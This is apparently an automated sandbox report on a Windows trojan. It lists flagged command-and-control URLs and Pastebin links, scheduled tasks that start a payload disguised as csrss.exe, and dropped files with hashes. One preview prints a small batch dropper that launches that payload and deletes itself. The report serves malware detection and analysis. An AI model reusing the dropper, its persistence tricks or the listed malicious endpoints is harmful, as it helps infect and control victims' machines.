                http://a1068999.xsph.ru/L1nc0In.php?dJpokCi4eIn08fwF5fxU0YsMAMpZQ=HlIVmDvSw9kuH3D6DEv6BSc&FEbcnYXInwA=sn2&7f588507da462c66c8d7e4bf263478da=811e4ff91d24acd2ff809d0fba0acc36&c6a8234adf537449ee48f442440ce8cf=wMxMTZzImY1EzMiFmMzYWY1UmY5YjYlNGNlhTZ0IjM2YjY3MTOmdjM&dJpokCi4eIn08fwF5fxU0YsMAMpZQ=HlIVmDvSw9kuH3D6DEv6BSc&FEbcnYXInwA=sn2true
                • Avira URL Cloud: malware
                		unknown
                https://pastebin.com/raw/GTMsT9mifalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://cp.sprinthost.ruMImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.000000000321C000.00000004.00000800.00020000.00000000.sdmp, MImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.0000000003244000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://index.from.sh/pages/game.htmlMImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.000000000321C000.00000004.00000800.00020000.00000000.sdmp, MImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.0000000003244000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://a1068999.xsph.ru/L1nc0In.php?dJpokCi4eIn08fwF5fxU0YsMAMpZQ=HlIVmDvSw9kuH3D6DEv6BSc&FEbcnYXInwMImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.0000000003203000.00000004.00000800.00020000.00000000.sdmp, MImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.0000000003244000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://a1068999.xsph.ru/MImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.00000000031F5000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameserverwinCommon.exe, 00000004.00000002.1697465797.0000000002558000.00000004.00000800.00020000.00000000.sdmp, MImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.0000000003189000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://pastebin.comMImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.00000000031AF000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://pastebin.comMImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.00000000031A5000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://a1068999.xsph.ruMImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.000000000321C000.00000004.00000800.00020000.00000000.sdmp, MImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.0000000003203000.00000004.00000800.00020000.00000000.sdmp, MImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.0000000003244000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://cp.sprinthost.ru/auth/loginMImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.000000000321C000.00000004.00000800.00020000.00000000.sdmp, MImOLbdPzolqACtrpVpcRPdPWZg.exe, 00000013.00000002.1784881543.0000000003244000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        172.67.19.24
                        		pastebin.comUnited States
                        		13335CLOUDFLARENETUSfalse
                        141.8.192.164
                        		a1068999.xsph.ruRussian Federation
                        		35278SPRINTHOSTRUtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1583170
                        Start date and time:2025-01-02 06:36:06 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 7m 7s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:26
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:CRf9KBk4ra.exe
                        renamed because original name is a hash value
                        Original Sample Name:8b7b1adcb1ea8edff9888558ef898054.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@27/14@2/2
                        EGA Information:
                        • Successful, ratio: 20%
                        HCA Information:
                        • Successful, ratio: 71%
                        • Number of executed functions: 413
                        • Number of non-executed functions: 103
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, csrss.exe, SIHClient.exe, conhost.exe
                        • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target MImOLbdPzolqACtrpVpcRPdPWZg.exe, PID 7776 because it is empty
                        • Execution Graph export aborted for target MImOLbdPzolqACtrpVpcRPdPWZg.exe, PID 7800 because it is empty
                        • Execution Graph export aborted for target csrss.exe, PID 8044 because it is empty
                        • Execution Graph export aborted for target serverwinCommon.exe, PID 7480 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        00:37:07API Interceptor15x Sleep call for process: MImOLbdPzolqACtrpVpcRPdPWZg.exe modified
                        05:37:00Task SchedulerRun new task: csrss path: "C:\Recovery\csrss.exe"
                        05:37:01Task SchedulerRun new task: csrssc path: "C:\Recovery\csrss.exe"
                        05:37:01Task SchedulerRun new task: MImOLbdPzolqACtrpVpcRPdPWZg path: "C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe"
                        05:37:01Task SchedulerRun new task: MImOLbdPzolqACtrpVpcRPdPWZgM path: "C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe"

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        172.67.19.24rrats.exeGet hashmaliciousAsyncRATBrowse
                        • pastebin.com/raw/KKpnJShN
                        sys_upd.ps1Get hashmaliciousUnknownBrowse
                        • pastebin.com/raw/sA04Mwk2
                        cr_asm_menu..ps1Get hashmaliciousUnknownBrowse
                        • pastebin.com/raw/sA04Mwk2
                        cr_asm2.ps1Get hashmaliciousUnknownBrowse
                        • pastebin.com/raw/sA04Mwk2
                        cr_asm_phshop..ps1Get hashmaliciousUnknownBrowse
                        • pastebin.com/raw/sA04Mwk2
                        VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                        • pastebin.com/raw/sA04Mwk2
                        HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                        • pastebin.com/raw/sA04Mwk2
                        xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                        • pastebin.com/raw/sA04Mwk2
                        steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                        • pastebin.com/raw/sA04Mwk2
                        cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                        • pastebin.com/raw/sA04Mwk2

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        pastebin.comdF66DKQP7u.exeGet hashmaliciousXWormBrowse
                        • 104.20.3.235
                        2QaN4hOyJs.exeGet hashmaliciousXWormBrowse
                        • 104.20.3.235
                        bad.txtGet hashmaliciousAsyncRATBrowse
                        • 104.20.3.235
                        dlhost.exeGet hashmaliciousXWormBrowse
                        • 104.20.4.235
                        htkeUc1zJ0.exeGet hashmaliciousUnknownBrowse
                        • 104.20.4.235
                        c2.exeGet hashmaliciousXmrigBrowse
                        • 104.20.4.235
                        Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkGet hashmaliciousUnknownBrowse
                        • 172.67.19.24
                        RdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                        • 104.20.4.235
                        file.exeGet hashmaliciousXWormBrowse
                        • 172.67.19.24
                        main.exeGet hashmaliciousUnknownBrowse
                        • 104.20.4.235

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        CLOUDFLARENETUShttp://www.rr8844.comGet hashmaliciousUnknownBrowse
                        • 188.114.96.3
                        https://bitl.to/3Y0BGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                        • 104.17.208.240
                        ETVk1yP43q.exeGet hashmaliciousAZORultBrowse
                        • 104.21.79.229
                        AimStar.exeGet hashmaliciousBlank GrabberBrowse
                        • 162.159.128.233
                        7FEGBYFBHFBJH32.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                        • 188.114.96.3
                        16oApcahEa.exeGet hashmaliciousBabuk, DjvuBrowse
                        • 104.21.32.1
                        UhsjR3ZFTD.exeGet hashmaliciousLummaCBrowse
                        • 104.21.32.1
                        544WP3NHaP.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                        • 172.67.220.198
                        KRNL.exeGet hashmaliciousLummaCBrowse
                        • 172.67.157.254
                        01012025.htmlGet hashmaliciousHTMLPhisherBrowse
                        • 104.17.25.14
                        SPRINTHOSTRU5Ixz5yVfS7.exeGet hashmaliciousDCRatBrowse
                        • 141.8.192.151
                        rWjaZEKha8.exeGet hashmaliciousDCRatBrowse
                        • 141.8.197.42
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                        • 185.185.71.170
                        aweqG2ssAY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                        • 185.185.71.170
                        vOizfcQSGf.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                        • 185.185.71.170
                        EnoSY3z6MP.exeGet hashmaliciousCryptbotBrowse
                        • 185.185.71.170
                        vH7JfdNi3c.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                        • 185.185.71.170
                        U6mwWZlkzH.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                        • 185.185.71.170
                        KzLv0EXDs1.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                        • 185.185.71.170
                        JiZQEd33mn.exeGet hashmaliciousUnknownBrowse
                        • 185.185.71.170

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        3b5074b1b5d032e5620f69f9f700ff0e7FEGBYFBHFBJH32.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                        • 172.67.19.24
                        test.doc.bin.docGet hashmaliciousUnknownBrowse
                        • 172.67.19.24
                        web44.mp4.htaGet hashmaliciousLummaCBrowse
                        • 172.67.19.24
                        test.doc.bin.docGet hashmaliciousUnknownBrowse
                        • 172.67.19.24
                        eP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                        • 172.67.19.24
                        YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                        • 172.67.19.24
                        1.ps1Get hashmaliciousUnknownBrowse
                        • 172.67.19.24
                        Let's_20Compress.exeGet hashmaliciousUnknownBrowse
                        • 172.67.19.24
                        YJaaZuNHwI.exeGet hashmaliciousQuasarBrowse
                        • 172.67.19.24
                        Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                        • 172.67.19.24

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Recovery\886983d96e3d3e

                        Download File
                        Process:C:\hyperBrowsermonitorNet\serverwinCommon.exe
                        File Type:ASCII text, with very long lines (880), with no line terminators
                        Category:dropped
                        Size (bytes):880
                        Entropy (8bit):5.904945734644475
                        Encrypted:false
                        SSDEEP:24:HrbfFNLNEz9y8kfCXbQW79LEYMz5r05MejlkSoPPOXVXvy/oe+sS9:HnXm0RCrbg6XJkSSwvy/Y
                        MD5:93448FA0C512880822D9D4940E40D936
                        SHA1:BFC6E34A6FC5A719DC169BA4981CB115F4D6AFB2
                        SHA-256:CC318F44A220D49827A5820D443B44945CBAA2B5FDF60C00ACBA1F2B2F89E2F1
                        SHA-512:D8FA5A3154DDD2B840732E129BC3C907DE8E8A7CAB99BCD9661DE3D0DD23D4E896E0E89CD28489FB247C3C9781CD7820D1C6D06E6F2DACF331E002351B1DCE78
                        Malicious:false
                        Preview:7touuEv4MWpa48iVvLKonbWF7tFoJMx1k03WdBjv2riNMKBV7AhYL7PfWiwA9GuAix0EEM1umZv53I3xsuqJoYqmlX95Oiwv6ioZT7QvIxwwLTmOp9SPZlVJHOdrN6fEmA8Uddeud5B1m3aRvvPPPhWVNfREdjiLRrJLVSuLfhvejehNyM5brQyFnmH8MZQ3W0j4uO5cADtsv2wt8EPRnGdA3DhsLv9FQ2Ht4mckQdbngGUv0YAHJ8PQWjBqqMROEob2vDyVlpBKp0extw2xv15Rn0WVlv3DLMj2obAxjoge7ElgEN74UedMsJP4qduzv89cQlIRwFOGVbUiP0QXy9srtXJfMFGF4rs9FIPdEqIPQX0Ryqo0NWBvPSt2cmEq8IMosVcHkxSH1daWg2rfbQ1hp7txZWAcmbRHKMjdOhPaD44v1XWj5iPrQo8vlpsNw0eZMSLTTOR3BbdvD86BAbgDMj1fOx1izBoNZejiMCQrRVqzLMrntqNUUbNmbpFfWsE9xQWjYXz8Kzv03BUCGOzIyT27Q6Hg7uViRqB5zIOV0OJfpWtZUCZH25LeXYSbQTBaeMjN9YM7AeSjJXR4NrL4VNqVfhia0wFhNtAcwfa60cGYnlV9HYOjHGEQgNrc0vGNYuWZWyHrQPE3GRs4MiTcigaGpu6jx7FEV393O5nSQgS1CLJOfxPSbop2TPum2i4TKAhNRzpQ4BLCOiEdkrDArwmrNHj9LBZsm9rCn56qI9XacnovKQBKe3lXX0AKPpE3ldZO1CzouX2sYMOjcyy5AONsXTox5wac4ey8NZ3HaWaGB38Llarb0J3XPr1hYCt86ax4XPVD4qenyGreUcLeE9lvkbtgiWtYmcKkFEyVEohJ

                        C:\Recovery\8a9d991feea8c9

                        Download File
                        Process:C:\hyperBrowsermonitorNet\serverwinCommon.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):242
                        Entropy (8bit):5.762820201164047
                        Encrypted:false
                        SSDEEP:6:hG1dTqa306R+gBmekzQ0UINdYyhKOEqRkXUOWU:asa3VRBBmv81INaqR0
                        MD5:6D628C1F11861636984515354CF155E0
                        SHA1:5306610FD0028E0F5A02959DA9175051B055ED53
                        SHA-256:962F943F8E22D3F51FFAB836B062490E087E5AD7CCC509710FD1697CF81194E1
                        SHA-512:3C6C9BA15D8B286BAAF2AD1247DC79B006A46BDC9712F401E19DA70804A1E48F38AAC929AE8C2AD096B797DBE879DFE303B5EC6AFC6D0DE01807680325D57D40
                        Malicious:false
                        Preview:zWiEaLMMMEa8pJ6JJuJEj7wtOcRLEbieogrRRF6Xlr3SQLHJ7D83fEp1kzz83BIug6UJbp2Exvd1EdcCVHNAdp8j1zrcP8dkjJwU17rSL4FulxxGXxmvxHQ07uSm8ayzR2S5qHLYa5yjkO7DCkEcVrwb26WGoFUvFPcte2ZPlOV2TrQtxOkXVWejG1CuvEtVkDeUvOjKLz0GW3ILpmTZf7asu2nnzodhfARPN68ipaLffYNMs1

                        C:\Recovery\MImOLbdPzolqACtrpVpcRPdPWZg.exe

                        Download File
                        Process:C:\hyperBrowsermonitorNet\serverwinCommon.exe
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):1060864
                        Entropy (8bit):6.655706570123378
                        Encrypted:false
                        SSDEEP:24576:eJ6l5/ZSKMFNz12i3Z8Lkj7GDAd7Gcndd2J:eJU5zEz2t6J7G2g
                        MD5:BB31080A1AC450BC92BE05ED245BBCEB
                        SHA1:593E5C2054DA1A65009E1BA08C6580B3FB23FB46
                        SHA-256:6435DC89765468B566887BF9AE0F25B79E701A73223D92C1764CACF2F671BFF3
                        SHA-512:830A4EBD1D6022F188C32AEFB25A4D50A73C2E69789349FD6FDD43594A324C79C7369C99B840313B663646B5C7F283DB4B7CCDD6DAC39632929156934708D8DA
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 74%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.................................`...K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`.......*..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Recovery\csrss.exe

                        Download File
                        Process:C:\hyperBrowsermonitorNet\serverwinCommon.exe
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):1060864
                        Entropy (8bit):6.655706570123378
                        Encrypted:false
                        SSDEEP:24576:eJ6l5/ZSKMFNz12i3Z8Lkj7GDAd7Gcndd2J:eJU5zEz2t6J7G2g
                        MD5:BB31080A1AC450BC92BE05ED245BBCEB
                        SHA1:593E5C2054DA1A65009E1BA08C6580B3FB23FB46
                        SHA-256:6435DC89765468B566887BF9AE0F25B79E701A73223D92C1764CACF2F671BFF3
                        SHA-512:830A4EBD1D6022F188C32AEFB25A4D50A73C2E69789349FD6FDD43594A324C79C7369C99B840313B663646B5C7F283DB4B7CCDD6DAC39632929156934708D8DA
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 74%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.................................`...K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`.......*..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MImOLbdPzolqACtrpVpcRPdPWZg.exe.log

                        Download File
                        Process:C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe
                        File Type:CSV text
                        Category:dropped
                        Size (bytes):1498
                        Entropy (8bit):5.364175471524945
                        Encrypted:false
                        SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNCsXE4Npv:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAu
                        MD5:F3E4B39D94849B092D4BB1072DD5F435
                        SHA1:0D7C96B89B2901834CF0FF5EC99579B8DE65DD72
                        SHA-256:BD51FDC1EF08B5BF92E800C79A01CD5783EA62FA3240505AC6AC8B5969782046
                        SHA-512:C5B7C6D226EFDD26D14F55EFF6C5714ACF7452B70F29F43DC1E2BFEDA58F5883878EAFFE2B3AF060C656EA7BF99B94D9B3D3E22EF847625D5B78F60DD9DC1733
                        Malicious:false
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\serverwinCommon.exe.log

                        Download File
                        Process:C:\hyperBrowsermonitorNet\serverwinCommon.exe
                        File Type:CSV text
                        Category:dropped
                        Size (bytes):1740
                        Entropy (8bit):5.36827240602657
                        Encrypted:false
                        SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpaqZ4x
                        MD5:B28E0CCD25623D173B2EB29F3A99B9DD
                        SHA1:070E4C4A7F903505259E41AFDF7873C31F90D591
                        SHA-256:3A108902F93EF9E952D9E748207778718A2CBAEB0AB39C41BD37E9BB0B85BF3A
                        SHA-512:17F5FBF18EE0058F928A4D7C53AA4B1191BA3110EDF8E853F145D720381FCEA650A3C997E3D56597150149771E14C529F1BDFDC4A2BBD3719336259C4DD8B342
                        Malicious:false
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                        C:\Users\user\AppData\Local\Temp\KPLr9FsY2g.bat

                        Download File
                        Process:C:\hyperBrowsermonitorNet\serverwinCommon.exe
                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):186
                        Entropy (8bit):5.04318510136636
                        Encrypted:false
                        SSDEEP:3:mKDDBEIFK+KdTVpM3No+HK9ATScyW+jn9m7SXyCIvBktKcKZG1t+kiE2J5xAI8pW:hITg3Nou11r+DE7kyBvKOZG1wkn23faK
                        MD5:8202605AEFAD7B301FD98F4393D839B6
                        SHA1:EB0DB49FC92E4E26782CD236C847F7C55ECE0CA7
                        SHA-256:1FD2EB4DC475A7622046C27A931B972106A452EA4E4FCF58BE1FF464C5E1D17E
                        SHA-512:641A4EC0149D36CBB4E22E1AC326E9F50780B3A148FDE1C54C7C9B5837731D90544ECD7E6755FF203D4DEBD852E3A604236648AE1ECF64AB1C551C7F3B98135A
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Recovery\csrss.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\KPLr9FsY2g.bat"

                        C:\Users\user\AppData\Local\Temp\YjY3J8VZ1h

                        Download File
                        Process:C:\hyperBrowsermonitorNet\serverwinCommon.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):25
                        Entropy (8bit):4.243856189774724
                        Encrypted:false
                        SSDEEP:3:E5sdGdFP:M1
                        MD5:E22A836C8188AA30ACC08950545976DB
                        SHA1:E4EC6CC383B47B47FE6FC90BA1696CF8E2FFCEE0
                        SHA-256:464F38AD81D94FA12D97E55D57C47169A5A22873B0CE3CB5A5E74CC421B6160A
                        SHA-512:3757DA4A70ED30DF57A47313C5B0892BABD2138ACA28D74723EED932146528E76D31863BABD1F378C400D3792BD3C5A65F647E8AC5D3FC62DDBB1F06006023B8
                        Malicious:false
                        Preview:wxnE4EMeZkXfn0IxRmTibetSR

                        C:\Windows\TAPI\8a9d991feea8c9

                        Download File
                        Process:C:\hyperBrowsermonitorNet\serverwinCommon.exe
                        File Type:ASCII text, with very long lines (824), with no line terminators
                        Category:dropped
                        Size (bytes):824
                        Entropy (8bit):5.903218902323142
                        Encrypted:false
                        SSDEEP:24:Nc1cJMaZLZrihC9j966T0M9naAKbdzIkC8d8dhWywIaMyVc:W1+mC9j9MO40kd82ywiyy
                        MD5:C86D0309A6D5BD7ACD6117C7D97B3EC9
                        SHA1:4E58209F76B28BFCC92ABADD95F0552632173916
                        SHA-256:C8D7F61062D007716DF752F3B579DD6E3DFAAAF1859A39CB6DC6660DFAB9A4DA
                        SHA-512:EAB43B085AD7417CFD061A9AA8FEC03D8D7448C1B6C33FA96BE154A38A5C4CFE92594D2E78AF93D4BA5BEFA03400721AE71C83F30B88E08C10D6B54D98592758
                        Malicious:false
                        Preview:BT6gzei7FAW6GZQozZZcbGU2kgMJxhYiMvDu1zPJ8MjOML376RAydfX59E5SSZKimxuUVgwAKPdOgFpYnPNfgjEqYIvx361jCBmZbilZfAoOCJZ3YhpDMoBCsD6Nv9HOY4MfdQ7EnxAg50oPs1YWQyXXAjqXmYof2azI63ZIjlaYoeH2Zre3kv7jgzf4jkbOIeofAgSzbQwpY8sfby754u5GdPlHYfi8JLPK0m13YpbU8RLiG9cvmgUYjhCu4La5syfMsipz6EgPSlILEDBZDwVn11lSjG8NOglKv9zhUmzi9FF7Z0q1KB15c2V07WPzGTAw97ZFOdEb7xovwn3taGDMoqr3n8k7W9cqES8balnq6a8pNjEUdgZ9PxITQgbP3HF7V8reobSydWQNrBpD4PezjcaQJpL4JXxzUAUP2jpBOlg2h4lO0YVnnQX2hbV9QXoFjb3qrZLUkck86htOD6EvCJMEncraOqv16aTGB4haMADKpZ5AsG5TT3CZPyDPsuG3rtCfNmNIZnjCGBYNgrsHubiCY40M1Rsb3Jc6WZxF3x3qU9TNaztBC9JQK9HTwARH4HJ6jb1G4nO7h1sYlnwBirZ49MvWSdS2fwvM0Wo88nHYuMsSQtsJNQjNrP6WqexaUVbvGgiO8yC5kBJxdcGjvJoOMielZRSezqDZu7MuKdKZNnmqFJ3NYOpKqNiiB7zrgiG37uCgQVYR9PAi5yfPXEFkB3shYosNnc3phttUGW6C0XKbM9mNbjTbcf2DBfImmKnhVVBMEKJBHDuosRVYBfwEJcMC0pTlOUZptnF08aIQaSTZvOVu

                        C:\Windows\TAPI\MImOLbdPzolqACtrpVpcRPdPWZg.exe

                        Download File
                        Process:C:\hyperBrowsermonitorNet\serverwinCommon.exe
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):1060864
                        Entropy (8bit):6.655706570123378
                        Encrypted:false
                        SSDEEP:24576:eJ6l5/ZSKMFNz12i3Z8Lkj7GDAd7Gcndd2J:eJU5zEz2t6J7G2g
                        MD5:BB31080A1AC450BC92BE05ED245BBCEB
                        SHA1:593E5C2054DA1A65009E1BA08C6580B3FB23FB46
                        SHA-256:6435DC89765468B566887BF9AE0F25B79E701A73223D92C1764CACF2F671BFF3
                        SHA-512:830A4EBD1D6022F188C32AEFB25A4D50A73C2E69789349FD6FDD43594A324C79C7369C99B840313B663646B5C7F283DB4B7CCDD6DAC39632929156934708D8DA
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 74%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.................................`...K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`.......*..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\hyperBrowsermonitorNet\BYhHcZyz.vbe

                        Download File
                        Process:C:\Users\user\Desktop\CRf9KBk4ra.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):214
                        Entropy (8bit):5.835767309573248
                        Encrypted:false
